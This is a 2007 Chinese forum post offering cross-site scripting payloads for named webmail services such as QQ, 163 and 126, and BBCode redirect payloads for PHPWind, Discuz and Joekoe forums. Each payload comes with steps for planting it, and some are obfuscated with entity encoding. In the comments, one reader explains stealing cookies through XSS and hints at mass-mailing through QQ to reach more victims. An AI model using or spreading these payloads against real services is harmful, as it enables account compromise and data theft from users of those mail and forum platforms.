邮箱跨站代码（适用于QQ、163、126等邮箱）兼论坛跨站代码

作者：葬月 1432字节点击：48430 回复：5 所属分类：资料文档

创建时间：2007-06-12 17:06:00 最后修改时间：2007-06-13 09:55:10

邮箱的内嵌式框架跨站漏洞——
　　
　　QQ邮箱:
　　<img src=javascript:document.write('<Iframe%20src=输入你要跨的地址%20width=500%20height=550%3E</iframe%3E')>
　　利用方法："写信"—点击"显示工具条"—"<HTML>"，输入跨站代码即可。
　　
　　163邮箱:
　　<img src=j avascript:document.write('%3CIframe%20src=输入你要跨的地址%20width=500%20height=550%3E%3C/iframe%3E')>
　　利用方法：编辑源码处打上勾，输入跨站代码即可。
　　
　　126邮箱（同时也适用于QQ邮箱）:
　　<img src=javascri& #x70t:document.write('& #x3cIframe%20src=输入你要跨的地址%20width=500%20height=550%3E</iframe% 3E')>
　　利用方法：编辑源码处打上勾，输入跨站代码即可。
　　
　　21cn邮箱：
　　利用方法：风格设为为"左右"—"写信"—"插入图片"，在弹出的框里输入跨站代码即可。
　　
　　新浪邮箱：
　　利用方法："写信"—"插入图片"，在弹出的框里输入跨站代码即可。
　　
　　TOM邮箱：
　　利用方法："写信"—"编辑HTML信件"，再勾选上"编辑源码"，输入跨站代码即可。
　　
　　Sohu邮箱：
　　利用方法：直接发送即可，但要回复才能看见效果。
　　
　　同时还适合于更多邮箱
　　
　　BBS的直接跨站漏洞（swf跳转）——
　　
　　PHPWind论坛的跨站代码： [wmv]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/wmv]
　　
　　Discuz论坛的跨站代码： [flash]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/flash]

Joekoe论坛的跨站代码： [QT=450,350]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/QT]

　　
　　同时适合于更多论坛，只要灵活运用就可以了。

附件：

评论：

	来自： 211.157.4.* 字节：38 ID：5047 发贴时间：2007-06-12 17:42:33 原贴
	弱弱地问一句，跨来何用？比如说邮箱的。
	来自：葬月字节：11 ID：5048 发贴时间：2007-06-12 17:45:33 原贴
	你又来了...
	来自： 211.157.4.* 字节：38 ID：5056 发贴时间：2007-06-13 10:20:38 原贴
	真心请教，想干坏事，不知道干些什么好啊
	来自： 222.209.222.* 字节：644 ID：5067 发贴时间：2007-06-13 19:29:44 原贴
	跨站攻击是指入侵者在远程Web页面的HTML代码中插入具有恶意目的的数据，使得用户认为该页面是可信赖的，但是当浏览器下载该页面，嵌入其中的脚本将被解释执行。跨站攻击有多种方式，典型的方式有两种：其一，由于HTML语言允许使用脚本进行简单交互，入侵者便通过技术手段在某个页面里插入一个恶意HTML代码—— 例如记录论坛保存的用户信息（Cookie），由于Cookie保存了完整的用户名和密码资料，用户就会遭受安全损失。 ----------------------- 邮箱的跨站就涉及社会工程学了，关键是看你选的人如何，邮箱跨站一般都建立在获得某帐号时候，利用这个帐号跳板，去获得你真正想要的东西。当然，QQ除外，因为QQ可以群发邮件，群发邮件意味着什么呢？。。。呵呵，稍微灵活点就知道了。
	来自： 218.210.23.* 字节：18 ID：14644 发贴时间：2009-07-31 14:55:53 原贴
	两年前的东西。。。
	来自： 123.122.3.* 字节：22 ID：18593 发贴时间：2012-02-16 14:37:32 原贴
	五年前的东西。。。。。
	来自： 203.93.209.* 字节：12 ID：18731 发贴时间：2012-05-19 10:38:33 原贴
	上世纪的东西

本文允许匿名评论

您不能对本文发表评论。